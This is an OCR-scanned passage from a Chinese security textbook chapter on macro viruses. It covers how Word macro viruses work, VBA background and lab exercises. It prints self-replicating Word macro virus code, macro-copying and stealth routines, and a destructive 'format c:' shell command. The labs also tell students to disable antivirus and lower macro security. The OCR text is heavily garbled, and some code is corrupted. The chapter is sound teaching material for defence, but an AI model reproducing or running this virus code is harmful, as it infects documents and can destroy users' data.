O97M. Tristate. C 宏 病 毒 可 以 交叉 感染 MS Word 97、MS Excel 97 和 MS PowerPoint 
97 等 多 种 程序 生成 的 数据 文件 。 病 毒 通过 Word 文档 、Excel 电子 表格 或 PowerPoint 幻灯 
片 被 激活 ,并 进行 交叉 感染 。 病 毒 在 Excel 中 被 激活 时 , 它 在 Excel Startup 目录 下 查找 文 
档 BOOK1. XLS, 如 果 不 存 在 ,病毒 将 在 该 目录 下 创建 一 个 被 感染 的 工作 禾 并 使 Excel 的 宏 
病毒 保护 功能 失效 。 病 毒 存放 在 被 感染 的 电子 表格 的 “ThisWorkbook” 中 。 

病毒 在 Word 中 被 激活 时 , 它 在 通用 模板 NORMAL. DOT 的 ThisDocument 中 查找 是 
否 存 在 它 的 代码 ,如果 不 存 在 ,病毒 感染 通用 模板 并 使 Word 的 宏 病 毒 保 护 功 能 失效 。 病 毒 
在 PowerPoint 中 被 激活 时 ,在 其 模板 BLANK PRESENTATION. POT 中 查找 是 否 存 在 模 
块 Triplicate。 如 果 没 找到 ,病毒 使 PowerPoint 的 宏 病 毒 保护 功能 失效 ,同时 添加 一 个 不 可 
见 的 形状 到 第 一 个 幻灯 片 ,并 将 和 目 身 复制 到 模板 。 该 病毒 无 有 效 载荷 ,但 会 将 Word 通用 模 
板 中 的 全 部 宏 移 走 。 在 以 上 3 种 应 用 中 病毒 的 感染 过 程 近似 ,但 在 每 种 应 用 中 的 激活 方式 
不 同 。 


3.4.4 Word 宏 病毒 的 工作 机 制 


Word 是 通过 模板 来 创建 文件 的 。 模 板 是 为 了 形成 最 终 文档 而 提供 的 特殊 文档 ,模板 
可 以 包括 以 下 几 个 元 率 : 菜单 .宏和 格式 。 模 板 是 文本 、 图 形 和 格式 编排 的 蓝图 ,对 于 某 一 
类 型 的 所 有 文档 来 说 ,文本 、 图 像 和 格式 编排 都 是 类 似 的 。Word 提供 了 几 种 常见 文档 类 型 
的 模板 ,如 备忘录 报告 和 商务 信件 。 用 户 可 以 直接 使 用 模板 来 创建 新 文档 ,或 者 加 以 修改 ， 
也 可 以 创建 自己 的 模板 。 一 般 情 况 下 ,Word 自动 将 新 文档 基于 默认 的 公用 模板 (Normal. 
dot) 。 可 以 看 出 ,模板 在 建立 整个 文档 中 所 起 的 作用 是 作为 一 个 基 类 。 新 文档 继承 了 模板 
的 属性 (包括 宏 .于 单 和 格式 等 ) 。 

1. Word 中 的 宏 

Word 处 理 文 档 需 要 同时 进行 各 种 不 同 的 动作 ,如 打开 文件 .关闭 文件 . 读 取 数据 资料 
以 及 存储 和 打印 等 。 每 一 种 动作 其 实 都 对 应 着 特定 的 宏 命 令 。 存 文件 对 应 着 FileSave、 改 
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名 存 文件 对 应 着 FileSaveAS、 打 印 则 对 应 着 FilePrint。Word 打开 文件 时 , 它 首 先 要 检查 是 
否 有 AutoOpen 宏 存 在 ,假如 有 这 样 的 宏 ,Word 就 启动 它 , 除 非 在 此 之 前 系统 已 经 被 “取消 
宏 ”(Disable Auto Macros) 命 令 设 置 成 宏 无 效 。 当 然 ,如 果 AutoClose 宏 存 在 , 则 系统 在 关 
闭 一 个 文件 时 ,会 日 动 执行 它 。 
Word 宏 及 其 运行 条 件 如 表 3-2 所 示 。 
表 3-2 Word 宏 及 其 运行 条 件 


类 别 运行 条 件 

AutoExec 启动 Word 或 加 载 全 局 模板 时 
AutoNew 每 次 创建 新 文档 时 

目 动 宏 AutoOpen 每 次 打开 已 存在 的 文档 时 
AutoClose 在 关闭 文档 时 
AutoExit 在 退出 Word 或 印 载 全 局 模板 时 
FileSave 保存 文件 

Pa FileSaveAs 改名 男 存 为 文件 


FilePrint 打印 文件 
FileOpen 打开 文件 


由 月 动 宏和 (或 ) 标 准 宏 构 成 的 宏 病 毒 ,其 内 部 都 具有 把 带 病 毒 的 宏 移植 (复制 ) 到 通用 
宏 的 代码 段 , 也 就 是 说 宏 病 毒 通 过 这 种 方式 实现 对 其 他 文件 的 传染 。 如 果 某 个 DOC 文件 
感染 了 这 类 Word 宏 病 毒 , 则 当 Word 执行 这 类 自动 宏 时 ,实际 上 就 是 运行 了 病毒 代码 。 当 
Word 系统 退出 时 , 它 会 自动 地 把 所 有 通用 宏 (当然 也 包括 传染 进来 的 宏 病 毒 ) 保 存 到 模板 
文件 中 。 当 Word 系统 再 次 启动 时 , 它 又 会 自动 地 把 所 有 通用 宏 (包括 宏 病 毒 ) 从 模板 中 装 
和 入。 如此, 一旦 Word 系统 遭受 感染 , 则 每 当 系统 进行 初始 化 时 ,都 会 随 着 模板 文件 的 装 人 
而 成 为 带 病毒 的 Word 系统 ,继而 在 打开 和 创建 任何 文档 时 都 会 感染 该 文档 。 

一 且 宏 病毒 侵入 Word 系统 , 它 就 会 蔡 代 原 有 的 正常 宏 ( 如 FileOpen、FileSave、 
FileSaveAs 和 FilePrint 等 ) 并 通过 它们 所 关联 的 文件 操作 功能 获取 对 文件 交换 的 控制 。 当 
某 项 功能 被 调用 时 ,相应 的 宏 病 毒 就 会 算 夺 控制 权 , 实 施 病 毒 所 定义 的 非法 操作 (包括 传染 
操作 及 破坏 操作 等 )。 宏 病毒 在 感染 一 个 文档 时 ,首先 要 把 文档 转换 成 模板 格式 ,然后 把 所 
有 宏 病 毒 ( 包 括 自 动 宏 ) 复 制 到 该 文档 中 。 被 转换 成 模板 格式 后 的 染 毒 文件 无 法 转 存 为 任何 
其 他 格式 。 含 有 自动 宏 的 宏 病 毒 染 毒 文档 当 被 其 他 计算 机 的 Word 系统 打开 时 , 便 会 自动 
感染 该 计算 机 ,如 图 3-19 所 示 。 


宏 病毒 将 自 z 
打开 被 感 把 宏 加 载 到 ss el 新 建 (打开 ) 
染 的 文档 内 存 us 0 的 文档 被 感染 


3-19 ”Word 宏 病 毒 的 感染 过 程 


几乎 所 有 已 知 的 宏 病 毒 都 沿用 了 相同 的 作用 机 制 。Word 宏 病 毒 几乎 是 唯一 可 跨越 不 
同 硬件 平台 而 生存 ,传染 和 流行 的 一 类 病毒 。 如 果 说 宏 病 毒 还 有 什么 局 限 性 的 话 , 那 就 是 这 
些 病毒 必须 依赖 某 个 可 受 其 感染 的 系统 (如 Word、Excel)。 没 有 这 些 特定 的 系统 ,这 些 宏 病 
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毒 便 成 了 无 水 之 鱼 。 由 于 Word 允许 对 宏 本 和 号 进行 加 密 操 作 , 因 此 有 许多 宕 病毒 是 经 过 加 
密 处 理 的 ,不 经 过 特殊 处 理 是 无 法 进行 编辑 或 观察 的 ,这 也 是 很 多 宏 病 毒 无 法 手工 杀 除 的 主 
要 原因 。 

2. Word 宏 语 言 


直到 20 世纪 90 年 代 早 期 ,使 应 用 程序 自动 化 还 是 充满 挑战 性 的 领域 。 对 每 个 需要 自 
动 化 的 应 用 程序 ,人 们 都 不 得 不 学 习 一 种 不 同 的 上 自动 化 语言 。 例 如 ,可 以 用 Excel 的 宏 请 言 
来 使 Excel 自动 化 ,使 用 BASIC 使 Word 自动 化 等 。 微 软 决定 让 它 开 发 出 来 的 应 用 程序 共 
享 一 种 通用 的 月 动 化 语言 ,这 种 霹 言 就 是 Visual Basic for ApplicationsC(VBA) 。 

作为 Visual Basic 家 族 的 一 部 分 ,VBA 于 1993 年 在 Excel 中 首次 发 布 , 并 且 集 成 到 微 
软 的 很 多 应 用 程序 中 。Office 97 及 其 高 版 本 应 用 程序 使 用 VBA 作为 它们 的 宏 语 言 和 编程 
语言 。 现 在 ,超过 80 个 不 同 的 软件 厂商 使 用 VBA 作为 他 们 的 宏 语 言 ,包括 Visio、AutoCAD 
和 Great Plains Accounting。VBA 人 允许 编程 者 和 终端 用 户 使 用 开放 软件 (多 数 是 Office 程 
序 ) 并 且 定 制 应 用 程序 。 今 天 ,VBA 是 宏 病 毒 制作 者 用 来 感染 Office 文档 的 首选 编程 语言 。 
表 3-3 列 出 了 不 同 的 微软 Office 程序 中 使 用 的 宏 语 言 版 本 。 


表 3-3 ”Office 程序 和 它们 所 使 用 的 宏 语 言 


Office 程序 版 本 宏 语 言 
Word 6.x, 7.xX BASIC 
Excel 5. x, 7. x VBA 3.0 
Office 97, Word 8.0, Excel 6.0\8.0, Project 98, Access 8.0 VBA 5.0 
Office 2K, Outlook 2K, FrontPage 2K VBA 6.0 
Office XP, OQutlook 2002, Word 2002, Access 2002, FrontPage 2002 VBA 6.3 
Office 2010 VBA 7.0 


读者 可 以 认为 VBA 是 非常 流行 的 应 用 程序 开发 语言 Visual Basic(VB) 的 子 集 。 但 实 
际 上 VBA 是 “寄生 于 ”VB 应 用 程序 的 版 本 。VBA 和 VB 的 区 别 包 括 如 下 几 个 方面 。 

(1) VB 是 设计 用 于 创建 标准 的 应 用 程序 ,而 VBA 是 使 已 有 的 应 用 程序 自动 化 。 

(2) VB 具有 自己 的 开发 环境 ,而 VBA 必须 寄生 于 已 有 的 应 用 程序 。 

(3) 要 运行 VB 开发 的 应 用 程序 ,用 户 不 必 安 装 VB, 因 为 VB 开发 出 的 应 用 程序 是 可 
执行 文件 (* .exe) ,而 VBA 开发 的 程序 必须 依赖 于 它 的 母体 应 用 程序 (如 Word 等 ) 。 

尽管 VBA 和 VB 存在 这 些 不 同 , 但 是 ,它们 在 结构 上 仍然 十 分 相似 。 事 实 上 ,如 果 你 已 
经 7 了解 了 VB, 会 发 现 学 习 VBA 非常 快 。 相 应 地 ,学 完 VBA 会 给 学 习 VB 打下 坚实 的 基 
础 。 如 果 读 者 已 经 学 会 在 Excel 中 用 VBA 创建 解决 方案 后 ,也 就 具备 了 在 Word、Access、 
Outlook、PowerPoint 等 Office 程序 中 用 VBA 创建 解决 方案 的 大 部 分 知识 。VBA 的 一 个 
关键 特征 是 所 学 的 知识 在 微软 的 一 些 产 品 中 可 以 相互 转化 。 

更 确切 地 讲 ,VBA 是 一 种 自动 化 语言 , 它 可 以 使 常用 的 程序 自动 化 ,并 且 能 够 创建 自 定 
义 的 解决 方案 。 

使 用 VBA 可 以 实现 如 下 功能 。 

(1) 使 重复 的 任务 自动 化 。 
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(2) 自 定义 Word 工具 栏 .菜单 和 界面 。 

(3) 简化 模板 的 使 用 。 

(4) 自 定 义 Word ,使 其 成 为 开发 平台 。 

3. 宏 病 毒 关键 技术 

接 下 来 的 一 部 分 内 容 简 单 介绍 宏 病 毒 中 常用 的 代码 段 。 理 解 这 些 程序 ,有 助 于 分 析 现 
有 宏 病 毒 源 代码 ,也 有 助 于 读者 制作 实验 型 宏 病 毒 。 

1) 宏 指 令 的 复制 技术 

正如 本 书 第 2 草 所 介绍 的 一 样 ,判断 一 个 系统 是 否 能 产生 恶意 代码 的 必要 条 件 是 “复制 
技术 ”。 也 就 是 说 ,如 果 宏 指令 不 能 实现 月 我 复制 ,黑客 们 就 不 可 能 制造 出 基于 “ 宏 指 令 ” 的 
恶意 代码 。 但 是 ,聪明 的 hacker 实现 了 宏 指 令 的 自我 复制 。 

实现 日 我 复制 的 代码 如 下 。 


'Micro 一 Virus 
Sub Document Open( ) 
On Error Resume Next 
Application. DisplayStatusBar = False 
Options. SaveNormalPrompt = False 
Ourcode = ThisDocument. VBProject. VBComponents(1).CodeModule.Lines(1, 100) 
Set Host = NormalTemplate. VBProject. VBComponents(1).CodeModule 
If ThisDocument = NormalTemplate Then 
Set Host = ActiveDocument. VBProject. VBComponents(1).CodeModule 
End If 
With Host 
If .Lines(1.1) <> "'Micro ~ Virus” Then 
.DeleteLines 1, .CountOfLines 
. InsertLines 1, Ourcode 
. ReplaceLine 2, "Sub Document Close()" 
If ThisDocument = nomaltemplate Then 
. ReplaceLine 2, "Sub Document Open()" 
ActiveDocument. SaveAs ActiveDocument. FullName 
End If 
End If 
End With 
MsgBox "MicroVirus by Content Security Lab" 
End Sub 


2) 日 动 执行 的 示例 代码 


Sub MAIN 
On Error Goto Abort 
iMacroCount = CountMacros(0, 0) 
// 检 查 是 否 感 染 该 文档 文件 
For i = 1 To iMacroCount 
If MacroName $ (i, 0, 0) = "PayLoad" Then 
bInstalled = -1 
// 检 查 正 常 的 宏 
End If 
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If MacroName $ (i, 0, 0) = "FileSaveAs" Then 
bTooMuchTrouble= 一 1 

// 但 如 果 FILESAVEAS 宏 存 在 那么 传染 比较 困难 

End If 

Next 1 

If Not bInstalled And Not bTooMuchTrouble Then 

// 加 入 FileSaveAs 并 复制 到 AutoExec and FileSaveAs. 
// 有 效 代 码 不 检查 是 否 感染 

// 把 代码 加 密使 其 不 可 读 

iWW6IInstance = Val(GetDocumentVar $ ("WWH6Infector" )) 
sMe$ = FileName$ () 

Macro$ = sMe$ + ":PayLoad" 

MacroCopy Macro $ , "Global:PayLoad", 1 

Macro$ = sMe$ + ":FileOpen" 

MacroCopy Macro $ , "Global:FileOpen", 1 

Macro$ =sMe$ + ":FileSaveAs" 

MacroCopy Macro $ , "Global:FileSaveAs", 1 

Macro$ =sMe$ + ":AutoExec" 

MacroCopy Macro $ , "Global:AutoExec", 1 
SetProfileString "WW6I", Str$ (iWW6IInstance + 1) 
End If 

Abort : 

End Sub 


3) SaveAs 程序 

SaveAs 是 一 个 当 使 用 FILE/SAVE AS 功能 时 ,复制 宏 病 毒 到 活动 文本 的 程序 。 它 使 
用 了 许多 类 似 于 AutoExec 程序 的 技巧 。 尽 管 示例 代码 短小 ,但 足以 制作 一 个 小 巧 的 宏 
病毒 。 


Sub MAIN 
Dim dlg As FileSaveAs 
GetCurValues dlg 
Dialog dlg 
If (Dlg. Format = 0) Or (dlg.Format = 1) Then 
MacroCopy "FileSaveAs", WindowName $ () + ":FileSaveAs" 
MacroCopy "FileSave ", WindowName $ () + ":FileSave" 
MacroCopy "PayLoad", WindowName $ () + ":PayLoad" 
MacroCopy "FileOpen", WindowName $ () + ":FileOpen" 
Dlg. Format = 1 
End If 
FileDaveAs dlg 
End Sub 


4) 特殊 代码 
还 有 些 方法 可 以 用 来 隐藏 和 使 你 的 宏 病 毒 更 有 趣 。 当 有 些 人 使 用 TOOLS/MICRO 沫 
单 观察 宏 时 ,该 代码 可 以 达到 掩饰 病毒 的 目的 。 


第 3 章 传统 计算 机 病毒 81 


Sub MAIN 
On Error Goto ErrorRoutine 
OldName $ = NomFichier $ () 
If macros. bDebug Then 
MsgBox " start ToolsMacro" 
Dim dlg As OutilsMacro 
If macros. bDebug Then MsgBox "1" 
GetCurValues dlg 
If macros. bDebug Then MsgBox "2" 
On Error Goto Skip 
Dialog dlg 
OutilsMacro dlg 
Skip: 
On Error Goto ErrorRoutine 
End If 
REM enable automacros 
DisableAutoMacros 0 
macros. SaveToGlobal (OldName $ ) 
macros. objective 
Goto Done 
ErrorRoutine: 
On Error Goto Done 
If macros. bDebug Then 
MsgBox "error " + Str$ (Err) + " occurred" 
End If 
Done: 
End Sub 


当然 读者 也 可 做 一 些 子 程序 ,并 在 子 程序 中 实现 对 系统 功能 的 调用 。 著 名 的 
NUCLEAR 宏 病 毒 尝试 编译 外 部 病毒 或 者 一 些 木 马 程序 ,进一步 增加 破坏 功能 。 当 打开 文 
件 时 ,实现 格式 化 硬盘 子 程序 包括 关键 语句 。 

sCmd$ = "echo y|format c: /un" 

Shell Environment $ ("COMSPEC") + "/c" + sCmd$ ，0 


和 警告 禁止 在 工作 的 计算 机 上 练习 该 语句 ,因为 可 能 会 造成 重大 损失 。 


4. 宏 病 毒 的 共性 

(1) 宏 病 毒 会 感染 文档 文件 和 模板 文件 。 被 宏 病 毒 感 染 的 文档 属性 必然 会 被 改 为 模板 
而 不 再 是 文档 ,而 用 户 在 执行 另存 文档 操作 时 ,就 无 法 将 该 文档 转换 为 任何 其 他 方式 ,只 能 
用 模板 方式 存盘 。 

(2) 打开 时 激活 ,通过 Normal 模板 传播 。 宏 病毒 的 传染 通常 是 在 Word 打开 一 个 带 宏 
病毒 的 文档 或 模板 时 被 激活 。 接 着 , 它 将 自身 复制 至 Word 的 通用 (Normal) 模 板 中 ,在 随 
后 的 打开 或 关闭 文件 操作 时 宏 病 毒 就 会 把 病毒 从 Normal 模板 复制 到 该 文件 中 。 
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(3) 通过 AutoOpen、AutoClose、AutoNew 和 AutoExit 等 自动 宏 获 得 控制 权 。 大 多 数 
宏 病 毒 中 含有 AutoOpen、AutoClose、AutoNew 和 AutoExit 等 自动 宏 。 只 有 这 样 , 宏 病 毒 
才能 获得 文档 (模板) 操作 控制 权 。 有 些 宏 病毒 还 通过 FileNew、 FileOpen、 FileSave、 
FileSaveAs 以 及 FileExit 等 宏 来 控制 文件 的 操作 。 

(4) 宏 病 毒 中 必然 含有 对 文档 读 写 操作 的 宏 指 令 。 宏 病毒 的 传播 过 程 必 人 然 要 对 文档 进 
行 读 写 操 作 , 以 把 病毒 本 身 的 宏 命令 插入 宿主 文档 中 ,因此 ,病毒 宏 中 都 含有 对 文档 的 读 写 
宏 指 令 。 

5. 宏 复制 实验 

该 实验 基于 “ 宏 指 令 的 复制 技术 ”代码 ,详细 的 实验 步骤 如 下 。 

【实验 目的 】 

(1) 演示 容 的 编写 。 

(2) 说 明 宏 的 原理 及 其 安全 漏洞 和 缺陷 。 

(3) 理解 宏 病毒 的 作用 机 制 。 

【实验 环境 】 

(1) Windows 系列 操作 系统 。 

(2) Word 2003 应 用 程序 。 

【实验 步骤 】 

(1) 软件 设置 : 关闭 杀毒 软件 的 目 动 防护 功能 。 

(2) 打开 Word 2003, 在 “工具 ”一 “ 宏 ” 一 “安全 性 ”中 ,将 安全 级 别 设置 为 低 , 在 可 徘 发 
行商 选项 卡 中 ,选择 信任 任何 所 有 安装 的 加 载 项 和 模板 ,选择 信任 visual basic 项 目的 访问 。 

(3) 自我 复制 功能 演示 。 打 开 一 个 Word 文档 ,然后 按 Alt 十 Fl1 组 合 键 调用 宏 编 写 窗 
口 (“工具 ”一 “ 宏 ” 一 Visual Basic 一” 宏 编 辑 大 >) ,在 左 侧 的 Project 王 “Microsoft Word 对 象 ” 一 
ThisDocument 中 输入 源 代码 (参见 源 代码 一 或 者 从 下 载 文件 中 复制 ,位 置 为 : 本 书 配套 素 
材 目 录 \ Experiment\macro\macro_1. txt) ,保存 。 此 时 当前 Word 文档 就 含有 宏 病 毒 ,只 要 
下 次 打开 这 个 Word 文档 ,就 会 执行 以 上 代码 ,并 将 自生 复制 到 Normal. dot(Word 文档 的 
公共 模板 ) 和 当前 文档 的 This Document 中 ,同时 改变 商 数 名 (模板 中 为 Document Close， 
当前 文档 为 Document_ Open) 。 此 时 所 有 的 Word 文档 打开 和 关闭 时 ,都 将 运行 以 上 的 病 
毒 代码 ,可 以 加 入 适当 的 恶意 代码 ,影响 Word 的 正常 使 用 ,本 例 中 只 是 简单 地 弹出 一 个 提 
示 框 。 

(4) 清除 宏 病毒 。 对 每 一 个 受 感 染 的 Word 文档 进行 如 下 操作 。 

打开 受 感 染 的 Word 文档 ,进入 宏 编 辑 环 境 (Alt 十 Fl1), 打 开 Normal- 一 Microsoft 
Word 对 象 习 This Document, 清除 其 中 的 病毒 代码 (只 要 删除 所 有 内 容 即 可 )。 

然后 打开 Project~>Microsoft Word-~>This Document ,清除 其 中 的 病毒 代码 。 

实际 上 ,模板 的 病毒 代码 只 要 在 处 理 最 后 一 个 受 感 染 文件 时 清除 即 可 ,然而 清除 模板 病 
毒 后 ,如果 重新 打开 其 他 已 感染 文件 ,模板 将 再 次 被 感染 ,因此 为 了 保证 病毒 被 清除 ,可 以 查 
看 每 一 个 受 感 染 文 档 的 模板 ,如 果 存 在 病毒 代码 ,就 进行 一 次 清除 。 
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3.5 综合 实验 
综合 实验 一 : 32 位 文件 型 病毒 实验 


本 实验 是 根据 3. 3. 2 节 的 文件 型 病毒 编制 技术 设计 的 原型 病毒 。 之 所 以 设计 成 原型 病 
毒 ,是 因为 考虑 到 信息 安全 课程 的 特殊 性 。 学 习 病 毒 原 理 的 目的 是 为 了 更 好 地 防治 病毒 , 而 
不 是 教 读 者 编写 能 运行 于 实际 环境 的 病毒 。 

【实验 目的 】 

(1) 了 解 文件 型 病毒 的 基本 制作 原理 。 

(2) 了 解 病毒 的 感染 、 破 坏 机 制 ,进一步 认识 病毒 程序 。 

(3) 车 握 文 件 型 病毒 的 特征 和 内 在 机 制 。 

【实验 环境 了 

Windows 2000、Windows 9x、Windows NT 和 Windows XP。 

【实验 步骤 了】 

文件 位 置 : 本 书 配套 素材 目录 \Experiment\win32virus。 目 录 中 的 virus. rar 包 中 包括 
Virus. exe( 编 译 的 病毒 程序 ) 、 软 件 使 用 说 明 书 . doc( 请 仔细 阅读 )、 源 代码 详解 . doc( 对 代码 
部 分 加 入 了 部 分 注释 ) 以 及 pll. asm( 程 序 源 代码 ) 。Example. rar 包 中 选择 的 是 一 个 篆 用 程 
序 (ebookedit) 安 靶 后 的 安装 目录 下 的 程序 ,用 于 测试 病毒 程序 。 

预备 步骤 : 将 example. rar 解压 缩 到 某 个 目录 ,如 D: \virus\example。 解 压 完毕 后 ,应 
该 在 该 目录 下 有 Buttons 目录 、ebookcode. exe、ebookedit. exe、ebrand-it. exe 以 及 
keymaker. exe 等 程序 ,然后 把 virus. rar 包 解 压 后 的 Virus. exe 复制 到 该 目录 中 。 

实验 内 容 : 通过 运行 病毒 程序 观看 各 步 的 提示 以 了 解 病毒 的 内 在 机 制 。 详 细 的 演示 步 
又 参见 教学 PPT。 

【实验 注意 事项 】 

(1) 本 病毒 程序 用 于 实验 目的 ,请 妥善 使 用 。 

(2) 在 测试 病毒 程序 前 ,请 先 关 闭 杀 毒 软件 的 日 动 防护 功能 或 直接 关闭 杀毒 软件 。 

(3) 本 程序 是 在 开发 时 面向 实验 演示 用 的 ,侧重 于 演示 和 说 明 病 毒 的 内 在 原理 ,破坏 功 
能 有 限 ; 而 目前 流行 的 病毒 破坏 方式 比较 严重 ,而且 发 作 方式 非常 隐蔽 , 千 万 不 要 对 其 他 病 
毒 程 序 采 用 本 例 的 方式 来 进行 直接 运行 测试 。 

(4) 测试 完毕 后 ,请 注意 病毒 程序 的 清除 ,以 免 误 操 作 破 坏 计算 机 上 的 其 他 程序 。 


综合 实验 二 : 类 TaiWan No. 1 病毒 实验 


【实验 目的 】 

(1) 演示 宏 的 编写 。 

(2) 说 明 宏 的 原理 及 其 安全 漏洞 和 缺陷 。 
(3) 理解 宏 病 毒 的 作用 机 制 。 

【实验 环境 】 

(1) Windows 系列 操作 系统 。 
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(2) Word 2003 应 用 程序 。 

【实验 步骤 】 

(1) 软件 设置 : 关闭 杀毒 软件 的 日 动 防护 功能 。 

(2) 打开 Word 2003, 在 “工具 ”>“ 宏 ”一 “安全 性 ”中 ,将 安全 级 别 设置 为 低 , 在 可 徘 发 
行商 选项 卡 中 ,选择 信任 任何 所 有 安装 的 加 载 项 和 模板 ,选择 信任 visual basic 项 目的 访问 。 

(3) 类 台湾 1 号 病毒 。 代 码 位 置 为 本 书 配 套 素 材 日 录 : \ Experiment\macro\macro_2. txt。 

该 病毒 的 效果 为 , 当 打 开 被 感染 的 Word 文档 时 ,首先 进行 自我 复制 ,感染 Word 模板 ， 
然后 检查 日 期 ,判断 是 否 为 1 日 ( 即 在 每 月 的 1 日 会 发 作 ) ,然后 弹出 一 个 对 话 杠 ,要求 用 户 
进行 一 次 心算 游戏 ,这 里 只 用 四 个 小 于 10 的 数 相 乘 ,如 果 计 算 正 确 , 那 么 就 会 新 建 一 个 文 
档 ,出 现 如 下 字幕 :“ 何 谓 宏 病毒 ,答案 : 我 就 是 ……; 如 何 预防 宏 病 毒 ,答案 : 不 要 看 我 ……” 
如 果 计 算 错 误 ,新 建 20 个 写 有 ”" 宏 病毒 ?字样 的 Word 文档 ,然后 再 一 次 进行 心算 游戏 , 共 进 
行 3 次 ,然后 跳出 程序 。 关 闭 文档 的 时 候 也 会 执行 同样 的 询问 。 

(4) 清除 宏 病 毒 。 对 每 一 个 受 感 染 的 Word 文档 进行 如 下 操作 。 

打开 受 感 染 的 Word 文档 ,进入 宏 编 辑 环 境 (Alt 十 Fll1), 打 开 Normal 一 Microsoft 
Word 对 象 一 This Document ,清除 其 中 的 病毒 代码 (只 要 删除 所 有 内 容 即 可 )。 

然后 打开 Project-~>Microsoft Word-~This Document ,清除 其 中 的 病毒 代码 。 

实际 上 ,模板 的 病毒 代码 只 要 在 处 理 最 后 一 个 受 感染 文件 时 清除 即 可 ,然而 清除 模板 病 
毒 后 ,如 果 重 新 打开 其 他 已 感染 文件 ,模板 将 再 次 被 感染 ,因此 为 了 保证 病毒 被 清除 ,可 以 查 
看 每 一 个 受 感 当 文 档 的 模板 ,如 果 存 在 病毒 代码 ,就 进行 一 次 清除 。 


3.6 二 是 
一 、 填 空 题 
1. 在 DOS 操作 系统 时 代 ,计算 机 病毒 可 以 分 成 和 两 大 类 。 
2. Word 宏 病 毒 是 一 些 制 作 病 毒 的 专业 人 员 利 用 Microsoft Word 的 开放 性 专门 制作 
的 一 个 或 多 个 具有 病毒 特点 的 宏 的 集合 ,这 种 宏 病 毒 的 集合 影响 到 计算 机 的 使 用 ,并 能 通 
过 及 进行 日 我 复制 及 传播 。 
二 、 选择 题 
1. 在 Windows 32 位 操作 系统 中 ,其 EXE 文件 中 的 特殊 标识 为 ( ) 。 
A. MZ 3 EE C. NE D. LE 
2. 能 够 感染 EXE 文件 和 COM 文件 的 病毒 属于 ( ” ” )。 
A. 网 络 型 病毒 B. 蠕虫 型 病毒 
C. 文件 型 病毒 D. 系统 引导 型 病毒 
3. 第 一 个 真正 意义 的 宏 病 毒 起 源 于 ( ) 应 用 程序 。 
A. Word B. Lotus 1-2-3 C. Excel D. PowerPoint 
三 、 思 考题 


1. 通过 程序 语言 直接 操控 计算 机 底层 硬件 是 计算 机 病毒 创作 者 所 不 断奶 求 的 。 讨 论 
一 下 ,在 DOS、Windows 9x 系列 和 Windows NT 系列 系统 下 如 何 操作 底层 人 硬件 设备 。 


2. 
3。 
4. 
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在 32 位 Windows 系统 下 ,编制 一 个 原理 型 的 计算 机 病毒 最 基本 的 步骤 有 了 哪些? 
作为 一 类 曾经 非常 流行 的 病毒 ,论述 宏 病 毒 的 特点 。 
根据 宏 病 毒 的 特征 ,试探 讨 宏 病 毒 的 存在 环境 ，。 


四 、 实 操 题 


. 在 现 有 操作 系统 上 安 交 虚拟 机 软件 ,并 在 虚拟 机 中 安 交 DOS 7. 1 操作 系统 。 
. 学 习 并 实践 引导 型 病毒 原理 。 
. 学 习 并 实践 COM 文件 型 病毒 原理 。 


编译 并 运行 PE 文件 格式 查看 程序 ,完成 该 实验 。 
上 机 实践 32 位 文件 型 病毒 实验 。 


. 在 Word 2003 环境 下 ,用 宏 代 码 实现 宏 命 令 的 日 我 复制 功能 。 
. 擎 握 并 实验 类 台湾 1 号 宏 病 毒 。 
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1997 年 2 月 ,第 一 个 Linux 环境 下 产生 的 病毒 “上 天 的 赐 福 ”(Bliss) 出 现 , 宣 告 了 Linux 
没有 病毒 时 代 的 终结 2。 此 前 ,Linux 还 是 一 片 没 有 被 病毒 感染 的 乐土 ,一 直 给 人 “安全 操作 
系统 ”的 印象 。 此 后 ,又 传 出 了 包括 Lion 蠕虫 、 跨 Windows 和 Linux 平台 的 W32. Winux 
(又 名 W32. Lindoes 或 W32. PEEIf. 2132) 等 病毒 。 虽 然 这 些 病毒 的 传播 速度 及 破坏 性 和 
Windows 操作 系统 下 的 病毒 比 起 来 还 有 很 大 的 距离 ,但 是 这 些 病毒 的 出 现 说 明了 Linux 已 
经 不 再 是 没有 病毒 的 避风 港 。 

实际 上 ,没有 一 个 操作 系统 可 以 完全 抵御 计算 机 病毒 的 侵扰 。 一 个 病毒 可 以 完全 依 徘 
系统 本 号 进行 复制 ,例如 ,利用 Windows 操作 系统 的 PE 格式 的 可 执行 文件 和 利用 类 Linux 
操作 系统 的 ELF 格式 文件 。 所 以 ,任何 计算 机 病毒 都 依附 于 操作 系统 的 体系 结构 ,各 种 操 
作 系 统 病毒 的 写法 都 不 一 样 ,但 任何 操作 系统 都 逃避 不 了 病毒 ,这 当然 也 包括 Linux。 

正如 以 上 所 说 ,就 像 Windows NT 或 者 Mac OS 这 样 的 操作 系统 一 样 ,Linux 也 可 以 被 
感染 。 有 人 也 许 会 奇怪 ,事实 上 第 一 个 计算 机 病毒 是 UNIX 病毒 。 在 20 世纪 80 年 代 ,还 是 
南 加 州 大 学 在 读 研 究 生 的 Fred Cohen, 在 UNIX 系统 下 编写 了 第 一 个 会 自动 复制 并 在 计算 
机 间 进 行 传染 从 而 引起 系统 死机 的 病毒 ,因此 被 誉 为 “计算 机 病毒 之 父 ”。 由 于 类 Linux 系 
统 具 有 内 存 保护 机 制 ,因此 人 们 不 太 相 信和 类 Linux 系统 上 病毒 的 危害 性 会 超过 Windows 和 
DOS 系统 ,但 他 们 错 了 。 

本 章 学 习 目 标 

(1) 了 解 Linux 的 安全 问题 。 

(2) 掌握 Linux 病毒 的 概念 。 

(3) 掌握 Linux 下 的 脚本 病毒 。 

(4) 掌握 ELF 病毒 感染 方法 。 


4.1 Linux 系统 的 公共 误区 


一 个 最 大 的 误区 就 是 认为 高 性 能 的 安全 操作 系统 可 以 预防 计算 机 病毒 。 在 DOS 时 期 ， 
利用 DOS 系统 与 它 本 号 并 不 存在 任何 内 存 和 数据 保护 机 制 的 原理 编制 病毒 ,所 以 当时 的 病 
毒 可 以 完全 控制 计算 机 的 所 有 资源 。 的 确 , 它 们 会 很 轻易 地 成 为 DOS 和 简单 的 Windows 
操作 系统 的 完全 控制 用 户 。 这 说 明 没 有 内 存 保护 机 制 和 数据 保护 机 制 ,计算 机 病毒 可 以 村 
取 所 有 的 计算 机 控制 权 。 相 对 来 说 ,Windows NT 和 Linux 系统 是 具备 高 级 保护 机 制 的 系 
统 。 这 可 以 预防 大 多 数 的 病毒 的 传染 ,但 不 能 预防 所 有 的 病毒 。 当 一 个 用 户 以 root 或 
